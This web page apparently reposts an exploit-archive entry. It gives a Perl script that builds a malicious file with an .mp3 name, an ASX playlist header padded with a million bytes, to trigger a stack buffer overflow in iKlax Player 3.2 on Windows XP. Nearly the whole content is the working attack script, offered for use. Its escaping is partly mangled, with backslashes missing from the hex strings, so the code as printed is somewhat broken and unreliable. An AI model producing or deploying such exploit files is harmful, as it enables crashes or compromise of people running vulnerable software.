Home / os / win7

iKlax Player 3.2 (.mp3) File Buffer Overflow Stack Exploit

Posted on 08 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>iKlax Player 3.2 (.mp3) File Buffer Overflow Stack Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== iKlax Player 3.2 (.mp3) File Buffer Overflow Stack Exploit ========================================================== #!/usr/bin/perl # # iKlax Player 3.2 (mp3) #Author: hadji samir , s-dz@hotmail.fr #Download :http://www.brothersoft.com/iklax-player-122335.html # Tested : Windows XP SP3 (fr) # DATE : 2010-08-7 ################################################################### # samir tjrs mahboul-3lik # ################################################################### $file= &quot;mahboul-3lik.mp3&quot;; my A = &quot;x3Cx41x53x58x20x56x45x52x53x49x4Fx4Ex3Dx22x33&quot;. &quot;x2Ex30x22x3Ex0Ax0Ax3Cx45x4Ex54x52x59x3Ex3Cx54&quot;. &quot;x49x54x4Cx45x3Ex65x78x70x6Cx6Fx69x74x3Cx2Fx54&quot;. &quot;x49x54x4Cx45x3Ex0Ax3Cx52x45x46x20x48x52x45x46&quot;. &quot;x3Dx22&quot;; my B = &quot;x2Ex61x73x66x22x2Fx3Ex0Ax3Cx2Fx45x4Ex54x52x59&quot;. &quot;x3Ex3Cx2Fx41x53x58x3E&quot;; my $co2=&quot;x41&quot; x 1000000; open($FILE, &quot;&gt;$file&quot;); print($FILE $A.$co2.$B); close($FILE); print(&quot;exploit created successfully&quot;); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP